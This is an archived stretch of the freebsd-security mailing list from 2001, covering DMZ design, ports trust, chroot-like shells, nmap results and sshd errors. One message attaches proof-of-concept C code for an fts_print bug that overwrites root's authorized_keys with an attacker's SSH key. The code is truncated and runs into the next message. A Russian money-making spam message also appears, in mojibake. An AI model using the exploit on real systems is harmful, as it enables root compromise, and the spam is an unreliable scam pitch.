FreeBSD.org On Thu, 22 Nov 2001, Crist J. Clark wrote: > It is sad to see this poor design, > > Internet > | > | > Firewall--"DMZ" > | > | > Internal > > Used so very, very much these days (I think thanks to several firewall > vendors pushing this as a standard design). > > A much better design, is > > Internet > | > | > Firewall1 > | > | > DMZ > | > | > Firewall2 > | > | > Internal > > (This design is actually where the term "DMZ" comes from since it > actually looks like one here.) Could you please explain why the second design is better? I know it's harder to properly construct the correct ruleset for the first topology, but what are other problems? Thanks in advance, Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 12:29:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from csmail.commserv.ucsb.edu (cspdc.commserv.ucsb.edu [128.111.251.12]) by hub.freebsd.org (Postfix) with ESMTP id EFE4A37B417 for ; Thu, 22 Nov 2001 12:29:18 -0800 (PST) Received: from expertcity.com ([65.5.152.239]) by csmail.commserv.ucsb.edu (Netscape Messaging Server 3.62) with ESMTP id 419; Thu, 22 Nov 2001 12:29:16 -0800 Message-ID: <3BFD5FDE.171EA3A@expertcity.com> Date: Thu, 22 Nov 2001 12:28:14 -0800 From: Steve Francis X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: Fernando Germano , security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD References: <00ca01c172aa$814c90d0$ed64a8c0@audi2k> <20011122031739.A226@gohan.cjclark.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Crist J. Clark" wrote: > A much better design, is > > Internet > | > | > Firewall1 > | > | > DMZ > | > | > Firewall2 > | > | > Internal > > (This design is actually where the term "DMZ" comes from since it > actually looks like one here.) > > And in your case... that many NICs in one machine... I hope you have a > dedicated stand-by. It's screaming "single point of failure." I would > really consider NOT using one machine for all of this. Of course, your design has even more single points of failure.... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 13: 2:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists.blarg.net (lists.blarg.net [206.124.128.17]) by hub.freebsd.org (Postfix) with ESMTP id A319137B405; Thu, 22 Nov 2001 13:02:19 -0800 (PST) Received: from thig.blarg.net (thig.blarg.net [206.124.128.18]) by lists.blarg.net (Postfix) with ESMTP id 4039EBD3D; Thu, 22 Nov 2001 13:02:19 -0800 (PST) Received: from localhost.localdomain ([206.124.139.115]) by thig.blarg.net (8.9.3/8.9.3) with ESMTP id NAA20472; Thu, 22 Nov 2001 13:02:18 -0800 Received: (from jojo@localhost) by localhost.localdomain (8.11.6/8.11.3) id fAML0D475603; Thu, 22 Nov 2001 13:00:13 -0800 (PST) (envelope-from swear@blarg.net) To: "Anthony Atkielski" Cc: "FreeBSD Questions" , Subject: Re: setuid on nethack? References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com> From: swear@blarg.net (Gary W. Swearingen) Date: 22 Nov 2001 13:00:12 -0800 In-Reply-To: <016601c1733d$7a516b00$0a00000a@atkielski.com> Message-ID: Lines: 28 User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.1 (Cuyahoga Valley) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Anthony Atkielski" writes: > When I add ports and stuff to my system, sometimes they are picked up from some > bizarre FTP sites, and in cases where the executables do not have to be trusted, > some guidelines on how better to secure them would be welcome. I know that > often they are being rebuilt from source before installation, but it isn't > really practical to read through the source for every port just to look for > suspicious code. I've also worried about this sort of thing since learning the ports system last winter. There's a lot of downloading and running of scripts as root going on and it's scary, especially after you've spent many days tring to improve your security. A few more observations on the subject: The main defense seems to be the fear of being tracked down by hackers more skillful than most crackers, aided by the use of MD5 to verify that you're installing the same thing that someone else has already installed and found (with meager testing, sadly, but necessarily) to work OK. I've read of little vandalware on FreeBSD (or Linux). The risk seems acceptable for most people, at least those who do backups. There also might not be any less risky practical alternatives for many. If one learns the details of the ports system, one can do all or most of the ports stuff as a regular user, downloading, building, and installing to non-standard, non-root-protected directories. Someone posted some clues about this on -questions (or -stable?) withing the last couple of weeks, but I can't find my copy of it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 13: 8: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from freebie.atkielski.com (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by hub.freebsd.org (Postfix) with ESMTP id 307F237B405; Thu, 22 Nov 2001 13:07:52 -0800 (PST) Received: from contactdish (win.atkielski.com [10.0.0.10]) by freebie.atkielski.com (8.11.3/8.11.3) with SMTP id fAML7gJ01176; Thu, 22 Nov 2001 22:07:42 +0100 (CET) (envelope-from anthony@freebie.atkielski.com) Message-ID: <03a801c17399$ba011c30$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "Gary W. Swearingen" Cc: "FreeBSD Questions" , References: <014201c17336$40653f90$0a00000a@atkielski.com><20011122112415.B855@straylight.oblivion.bg><016001c17338$37d65240$0a00000a@atkielski.com><20011122114813.C855@straylight.oblivion.bg><016601c1733d$7a516b00$0a00000a@atkielski.com> Subject: Re: setuid on nethack? Date: Thu, 22 Nov 2001 22:07:42 +0100 Organization: Anthony's Home Page (development site) MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Alas! This does not make me feel warm and fuzzy! It's a good thing I'm not installing this at a bank. ----- Original Message ----- From: "Gary W. Swearingen" To: "Anthony Atkielski" Cc: "FreeBSD Questions" ; Sent: Thursday, November 22, 2001 22:00 Subject: Re: setuid on nethack? > "Anthony Atkielski" writes: > > > When I add ports and stuff to my system, sometimes they are picked up from some > > bizarre FTP sites, and in cases where the executables do not have to be trusted, > > some guidelines on how better to secure them would be welcome. I know that > > often they are being rebuilt from source before installation, but it isn't > > really practical to read through the source for every port just to look for > > suspicious code. > > I've also worried about this sort of thing since learning the ports > system last winter. There's a lot of downloading and running of scripts > as root going on and it's scary, especially after you've spent many days > tring to improve your security. A few more observations on the subject: > > The main defense seems to be the fear of being tracked down by hackers > more skillful than most crackers, aided by the use of MD5 to verify that > you're installing the same thing that someone else has already installed > and found (with meager testing, sadly, but necessarily) to work OK. > > I've read of little vandalware on FreeBSD (or Linux). The risk seems > acceptable for most people, at least those who do backups. There also > might not be any less risky practical alternatives for many. > > If one learns the details of the ports system, one can do all or most of > the ports stuff as a regular user, downloading, building, and installing > to non-standard, non-root-protected directories. Someone posted some > clues about this on -questions (or -stable?) withing the last couple of > weeks, but I can't find my copy of it. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 13:20:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.68.158.10]) by hub.freebsd.org (Postfix) with ESMTP id 647E837B405 for ; Thu, 22 Nov 2001 13:20:00 -0800 (PST) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [192.168.18.91]) by mafalda.univalle.edu.co (8.11.3/8.11.3) with ESMTP id fAMLJtP18694 for ; Thu, 22 Nov 2001 16:19:55 -0500 (GMT) Received: from libertad.univalle.edu.co (jmcamayo@localhost.univalle.edu.co [127.0.0.1]) by libertad.univalle.edu.co (8.12.0/8.12.0) with ESMTP id fAMLUh2x038259 for ; Thu, 22 Nov 2001 16:30:43 -0500 (COT) Received: from localhost (jmcamayo@localhost) by libertad.univalle.edu.co (8.12.0/8.12.0/Submit) with ESMTP id fAMLUhvK038256 for ; Thu, 22 Nov 2001 16:30:43 -0500 (COT) Date: Thu, 22 Nov 2001 16:30:43 -0500 (COT) From: Juan Mauricio Camayo To: freebsd-security@FreeBSD.ORG Subject: Re: Help on directories In-Reply-To: <001b01c1737a$9f1a7480$3600a8c0@DAVE> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, that is what i mean, now, let me know the shells that do it. On Thu, 22 Nov 2001, Dave Raven wrote: > As to whether or not this was the original question I am unsure, > but on the subject I was wondering how do you achieve the same effect that > adding a user to /etc/ftpchroot with a telnet / sshd shell. > This would be so the user can access his directory etc (/home/bob) but not > cd below it. > Many shell servers etc use it. > > At least, I think that was the question. > > > --Dave > Optec Sec. > ----- Original Message ----- > From: "Axel Scheepers" > To: "Juan Mauricio Camayo" > Cc: > Sent: Thursday, November 22, 2001 7:02 PM > Subject: Re: Help on directories > > > > On Thu, Nov 22, 2001 at 11:41:25AM -0500, Juan Mauricio Camayo wrote: > > > If someone know about a program that prevent the users to go back of his > > > own directory, but allow to "see" his directories on it, just like the > > > lids on Unix or linux, but not as restrictive as bash -r. > > > > I'm not quite sure what you mean, but you could try to chmod g-x for the > dir, > > that way it is still visible but only the owner can cd into it. > > Hope this helps, > > -- > > Axel Scheepers > > UNIX System Administrator > > > > email: axel@axel.truedestiny.net > > ascheepers@vianetworks.nl > > http://axel.truedestiny.net/~axel > > ------------------------------------------ > > "You can't survive by sucking the juice from a wet mitten." > > -- Charles Schulz, "Things I've Had to Learn Over and > > Over and Over" > > ------------------------------------------ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 13:37:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.ihug.co.nz (smtp1.ihug.co.nz [203.109.252.7]) by hub.freebsd.org (Postfix) with ESMTP id 9040737B416 for ; Thu, 22 Nov 2001 13:37:13 -0800 (PST) Received: from geoff (p36-max5.wlg.ihug.co.nz [203.173.231.36]) by smtp1.ihug.co.nz (8.9.3/8.9.3/Debian 8.9.3-21) with SMTP id KAA07838; Fri, 23 Nov 2001 10:37:04 +1300 X-Authentication-Warning: smtp1.ihug.co.nz: Host p36-max5.wlg.ihug.co.nz [203.173.231.36] claimed to be geoff Message-ID: <007b01c1739d$b0673ca0$24e7adcb@lawn> From: "Geoff Lawn" To: "Mike Silbersack" Cc: References: <20011121222647.O2710-100000@achilles.silby.com> Subject: Re: Unknown transient service 1528/tcp Date: Fri, 23 Nov 2001 10:35:52 +1300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Mike, > Were you nmapping the machine nmap was running on? You sometimes catch > the port nmap is running the scan from when doing it that way, if I recall > correctly. Yes, I was running "nmap localhost". I did a sockstat while nmap was running, and it looks like nmap choses a random port to use for each sequential port test. So I guess it's possible nmap chose a random port to use to test the same port number, and thus saw the port as being open! Thanks for your help, Geoff > > On Thu, 22 Nov 2001, Geoff Lawn wrote: > > > Hi there, > > > > I regularly do an nmap on our server with the following results... > > > > Port State Service > > 21/tcp open ftp > > 22/tcp open ssh > > 25/tcp open smtp > > 110/tcp open pop-3 > > 443/tcp open https > > > > Recently I noticed the following service appear... > > 1528/tcp open mciautoreg > > > > I did another nmap a minute later and the service was no longer there. > > > > Does anyone know what this might be? > > Have I been hacked?? > > > > Thanks, > > Geoff > > > Mike "Silby" Silbersack > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 13:52: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from razor.tuxtendo.nl (cp133353-d.venra1.lb.nl.home.com [213.51.187.141]) by hub.freebsd.org (Postfix) with ESMTP id 8441037B416 for ; Thu, 22 Nov 2001 13:51:59 -0800 (PST) Received: from localhost (localhost.localdomain [127.0.0.1]) by razor.tuxtendo.nl (Tuxtendo-ESMTP) with ESMTP id CCFBC27658; Fri, 23 Nov 2001 03:55:51 -0500 (EST) Date: Fri, 23 Nov 2001 03:55:51 -0500 (EST) From: PaZt To: Michael Richards Cc: Subject: Re: Odd sshd messages In-Reply-To: <3BFCF73E.000001.96546@frodo.searchcanada.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, please correct me if i'm wrong, but isnt that version a bit buggy ? If so, i would suggest taking a good look at your system and ofcourse upgrade it. cvsup rulez ;) On Thu, 22 Nov 2001, Michael Richards wrote: > I've been getting a number of odd sshd messages. I do not believe my > sshd is vulnerable to any exploits. Here is what I see: > > Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes > on input. > Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes > on input. > Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes > on input. > Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes > on input. > Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes > on input. > > May just be a bogus client, but it may also be someone hammering at > the back door. > > I'm running: > sshd version OpenSSH_2.3.0 > > -Michael > _________________________________________________________________ > http://fastmail.ca/ - Fast Free Web Email for Canadians To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 15:24:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id 3438237B405 for ; Thu, 22 Nov 2001 15:24:18 -0800 (PST) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 8358D2747; Thu, 22 Nov 2001 18:24:27 -0500 (EST) MIME-Version: 1.0 Message-Id: <3BFD892B.000003.14411@ns.interchange.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_RC68ULUXFQQMYJ0CCJD0" To: pazt@razor.tuxtendo.nl Subject: Re: Odd sshd messages Cc: freebsd-security@FreeBSD.ORG From: "Michael Richards" X-Fastmail-IP: 24.43.130.241 Date: Thu, 22 Nov 2001 18:24:27 -0500 (EST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --------------Boundary-00=_RC68ULUXFQQMYJ0CCJD0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit Actually I solved the problem. This was a 4.2-RELEASE machine but it had been upgraded from 3.x machine. Even though sshd 2.3.0 was installed the bootup scripts were running an old 1.x daemon provided by f-secure. So I upgraded everything on that machine so it's 4.4-STABLE now. -Michael > Well, please correct me if i'm wrong, but isnt that version a bit > buggy ? > > If so, i would suggest taking a good look at your system and > ofcourse upgrade it. > > cvsup rulez ;) > > On Thu, 22 Nov 2001, Michael Richards wrote: > >> I've been getting a number of odd sshd messages. I do not believe >> my sshd is vulnerable to any exploits. Here is what I see: >> >> Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check >> bytes on input. >> Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check >> bytes on input. >> Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check >> bytes on input. >> Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check >> bytes on input. >> Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check >> bytes on input. >> >> May just be a bogus client, but it may also be someone hammering >> at the back door. >> >> I'm running: >> sshd version OpenSSH_2.3.0 >> >> -Michael >> _________________________________________________________________ >> http://fastmail.ca/ - Fast Free Web Email for Canadians _________________________________________________________________ http://fastmail.ca/ - Fast Free Web Email for Canadians --------------Boundary-00=_RC68ULUXFQQMYJ0CCJD0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 15:54: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from c7.campus.utcluj.ro (c7.campus.utcluj.ro [193.226.6.226]) by hub.freebsd.org (Postfix) with SMTP id DF76F37B416 for ; Thu, 22 Nov 2001 15:53:58 -0800 (PST) Received: (qmail 5231 invoked by uid 1008); 22 Nov 2001 23:55:05 -0000 Date: Fri, 23 Nov 2001 01:55:05 +0200 From: veedee@c7.campus.utcluj.ro To: freebsd-security@freebsd.org Subject: fts_print bug? Message-ID: <20011123015505.A5165@c7.campus.utcluj.ro> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="YiEDa0DAkWCtVeE4" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --YiEDa0DAkWCtVeE4 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Does anyone know anything about this? It didn't worked on my box (4.3-RELEASE), but it did make some directories which I can't erase anymore... [#] rm -r 4965/ rm: fts_read: File name too long [#] ls -lR 4965/ [[0m4965: total 1 drwxr-xr-x 3 john users 512 Nov 23 01:48 [[01;34m YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! [[0m 4965/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! : total 1 drwxr-xr-x 3 john users 512 Nov 23 01:48 [[01;34mAAAAAAAAAAAAAAAAAA 4965/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA total 1 drwxr-xr-x 3 john users 512 Nov 23 01:48 [[01;34m YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! [[0m 4965/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! : total 1 drwxr-xr-x 3 john users 512 Nov 23 01:48 [[01;34mAAAAAAAAAAAAAAAAAA 4965/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA total 1 drwxr-xr-x 3 john users 512 Nov 23 01:48 [[01;34m YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! [[0m 4965/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! ---- Sorry for the messy output. A friend of mine found the "exploit" (see attachement) on BUGTRAQ. Best regards, Radu Bogdan Rusu (aka veedee) C7 Campus Network System Administrator --YiEDa0DAkWCtVeE4 Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="a.c" /* (c) 1999 babcia padlina ltd. bug in fts_print function allows to overwrite any file in system, when running /etc/security script (executed from 'daily' scripts). affected systems: - freebsd (all versions) - probably openbsd/netbsd fix: - limit root's coredump size - patch libc */ #include #include #include #include #include #define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" #define FILE "/root/.ssh/authorized_keys" #define CORE "find.core" #define DEPTH 300 #define BUFSIZE 250 int makedir(dir, linkfrom, linkto) char *dir, *linkfrom, *linkto; { if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) return -1; if (chdir(dir)) return -1; if (symlink(linkfrom, linkto) < 0) return -1; return 0; } int main(argc, argv) int argc; char **argv; { int i = 0; char pid[10], buf[BUFSIZE]; sprintf(pid, "%d", getpid()); if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) { perror("mkdir()"); return -1; } if (chdir(pid)) { perror("chdir()"); return -1; } bzero(buf, BUFSIZE); memset(buf, 0x41, BUFSIZE-1); for(i=0;i; Thu, 22 Nov 2001 22:37:43 -0800 (PST) Message-ID: <20011123063743.69061.qmail@web20205.mail.yahoo.com> Received: from [212.16.200.178] by web20205.mail.yahoo.com via HTTP; Thu, 22 Nov 2001 22:37:43 PST Date: Thu, 22 Nov 2001 22:37:43 -0800 (PST) From: GoodNews To: feedback@rocklyte.com MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Äîðîãîé äðóã! Èçâèíè, ÷òî îòáèðàþ òâîå âðåìÿ íà ÷òåíèå äàííîãî ïîñëàíèÿ,òàê êàê ìû âñå óñòàëè îò áåñêîíå÷íûõ ðåêëàìíûõ ðàññûëîê è âñÿ÷åñêîãî ìóñîðà,íî ÿ íàäåþñü, ÷òî íåñêîëüêî ìèíóò çàòðà÷åííîãî âðåìåíè ñìîãóò îêóïèòüñÿ, åñëè òû ðåøèøüñÿ èçìåíèòü ñâîé âçãëÿä íà îêðóæàþùóþ òåáÿ äåéñòâèòåëüíîñòü. Ïðåäëàãàåòñÿ â êîðíå èçìåíèòü ñâîþ æèçíü! È äëÿ ýòîãî ïðåäíàçíà÷åíà ïðîãðàììà, ðåàëüíî äåéñòâóþùàÿ, ñ ðåàëüíûìè âîçìîæíîñòÿìè çàðàáîòàòü äåíüãè, çàòðàòèâ íà ýòî íå î÷åíü áîëüøèå óñèëèÿ. Ýòîò ìåòîä çàðàáîòêà äåíåã íà ñàìîì äåëå ÄÅÉÑÒÂÓÅÒ ÍÀ 100%, ÊÎÃÄÀ ÓÃÎÄÍÎ, ÃÄÅ ÓÃÎÄÍÎ. Âû ñìîæåòå çàðàáîòàòü áîëåå 1.000.000 ðóáëåé â ïîñëåäóþùèå 90 äíåé. Ýòî íå öåïíîå ïèñüìî, à îòëè÷íàÿ ëåãàëüíàÿ âîçìîæíîñòü çàðàáîòàòü äåíüãè. Íå ïîæàëåéòå âðåìåíè, îçíàêîìüòåñü ñ ïðåäëàãàåìîé ïðîãðàììîé, è óñïåõ è áëàãîïîëó÷èå ïîñåòÿò Âàø äîì! Äàííîå ïèñüìî ïðèäåò ê Âàì íà ýòîò àäðåñ îäèí åäèíñòâåííûé ðàç, áîëüøå ÿ Âàñ íå ïîáåñïîêîþ. Íî åñëè ó Âàñ èìåþòñÿ è äðóãèå àäðåñà, íå îáèæàéòåñü, åñëè ýòî ïîñëàíèå ïðèäåò è íà íèõ,ïðîãðàììà íå ìîæåò îòñëåäèòü õîçÿèíà ÿùèêà, òîëüêî ôàêò ñóùåñòâîâàíèÿ àäðåñà. Åñëè Âàñ ýòî çàèíòåðåñîâàëî è Âû æåëàåòå áîëüøå óçíàòü î ðàáîòå ïðåäëàãàåìîé ïðîãðàììû, Âû ìîæåòå îòïðàâèòü äàííîå ñîîáùåíèå îáðàòíî ñ ïîìåòêîé "More", ÷òî áû ÿ âûñëàëà Âàì ïîäðîáíîå îïèñàíèå ðàáîòû ñèñòåìû ïî Âàøåìó æåëàíèþ, à íå çàíèìàòü Âàøå âðåìÿ è íå òðàòèòü Âàøè äåíüãè íà ïîëó÷åíèå âëîæåííîãî äîêóìåíòà. Âîçâðàùåííûå áåç äàííîé ïîìåòêè ïèñüìà áóäóò, êàê Âû ïðàâèëüíî äîãàäûâàåòåñü, óäàëÿòñÿ áåç ïðî÷òåíèÿ. Íî åñëè Âû õîòèòå ïîðóãàòüñÿ è âûïóñòèòü ïàð, òî ïîæàëóéñòà :-) Íàäåþñü, Âàì ñòàíåò ëåã÷å :-) Åùå ðàç èçâèíèòå, ÷òî îòíèìàþ Âàøå âðåìÿ. Óñïåõîâ âàì è âñÿ÷åñêèõ áëàã! __________________________________________________ Do You Yahoo!? Yahoo! GeoCities - quick and easy web site hosting, just $8.95/month. http://geocities.yahoo.com/ps/info1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1: 9:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id B963C37B418; Fri, 23 Nov 2001 01:09:16 -0800 (PST) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 2F13A66B74; Fri, 23 Nov 2001 01:09:16 -0800 (PST) Date: Fri, 23 Nov 2001 01:09:15 -0800 From: Kris Kennaway To: Anthony Atkielski Cc: "Gary W. Swearingen" , FreeBSD Questions , freebsd-security@FreeBSD.ORG Subject: Re: setuid on nethack? Message-ID: <20011123010915.A35695@xor.obsecurity.org> References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="45Z9DzgjV8m4Oswq" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <03a801c17399$ba011c30$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Thu, Nov 22, 2001 at 10:07:42PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --45Z9DzgjV8m4Oswq Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Nov 22, 2001 at 10:07:42PM +0100, Anthony Atkielski wrote: > Alas! This does not make me feel warm and fuzzy! It's a good thing I'm not > installing this at a bank. If you're going to run software written by Joe Random Coder, there's always an element of risk. There's nothing about the FreeBSD ports collection which increases this risk, and in fact it makes the situation slightly safer since we check all "spontaneous" changes in the md5 checksum of a distfile where the distfile changes with no change in the software version (e.g. once a few years ago someone broke into the main ftp server for the tcp_wrappers package, and added backdoor code to it. The compromised software could not be installed from the FreeBSD port unless you manually issued an override of the checksum). We have also found several isolated instances where software authors had 'spyware' code which reports details back to the author; these ports were summarily removed from the ports collection, again making things safer for the end user. Thirdly, since you have the source code you are free to examine it for yourself and evaluate your level of risk according to whichever criteria you choose. Kris --45Z9DzgjV8m4Oswq Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7/hI7Wry0BWjoQKURAthmAKDPgmZbU97GfKlPUnWaYMK1l0jwDQCeJKcn 5DBNwgzvQb/aBI0aYZS09h4= =QuWq -----END PGP SIGNATURE----- --45Z9DzgjV8m4Oswq-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 1:13:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from peony.ezo.net (peony.ezo.net [206.102.130.11]) by hub.freebsd.org (Postfix) with ESMTP id 4A84B37B416 for ; Fri, 23 Nov 2001 01:13:17 -0800 (PST) Received: from localhost (c3-1a119.neo.rr.com [24.93.230.119]) by peony.ezo.net (8.11.0.Beta3/8.11.0.Beta3) with SMTP id fAN9Kk630245 for security@FreeBSD.ORG; Fri, 23 Nov 2001 04:20:46 -0500 (EST) Message-Id: <200111230920.fAN9Kk630245@peony.ezo.net> From: jflowers@ezo.net To: 